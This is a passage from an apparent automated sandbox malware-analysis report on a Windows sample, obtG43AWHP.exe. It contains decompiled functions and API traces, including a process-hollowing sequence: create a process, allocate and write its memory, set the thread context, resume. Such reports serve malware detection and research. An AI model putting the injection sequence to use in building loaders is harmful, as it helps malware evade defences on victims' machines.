      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3260 Parent PID: 3248

    Executed Functions

    Function 001AE080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 001AE0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 001AE0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 001AE1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 001AE1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 001AE235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 001AE271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 001AE297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 001AE306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 001AE32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 001AE34E
    • ResumeThread.KERNELBASE(00000000), ref: 001AE35A
    Memory Dump Source
    • Source File: 0000000B.00000002.1510936054.001AD000.00000040.sdmp, Offset: 001AD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_11_2_1ad000_obtG43AWHP.jbxd
    Function 001AE380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 001AE493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 001AE4B6
      • Part of subcall function 001AE080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 001AE0C6
      • Part of subcall function 001AE080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 001AE0DC
      • Part of subcall function 001AE080: CreateProcessA.KERNEL32(?,00000000), ref: 001AE1C2
      • Part of subcall function 001AE080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 001AE1F0
    Strings
    Memory Dump Source
    • Source File: 0000000B.00000002.1510936054.001AD000.00000040.sdmp, Offset: 001AD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_11_2_1ad000_obtG43AWHP.jbxd
    Function 001AE510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 001AE54C
      • Part of subcall function 001AE380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 001AE493
      • Part of subcall function 001AE380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 001AE4B6
    Strings
    Memory Dump Source
    • Source File: 0000000B.00000002.1510936054.001AD000.00000040.sdmp, Offset: 001AD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_11_2_1ad000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 001ADFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 0000000B.00000002.1510936054.001AD000.00000040.sdmp, Offset: 001AD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_11_2_1ad000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3284 Parent PID: 3260

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
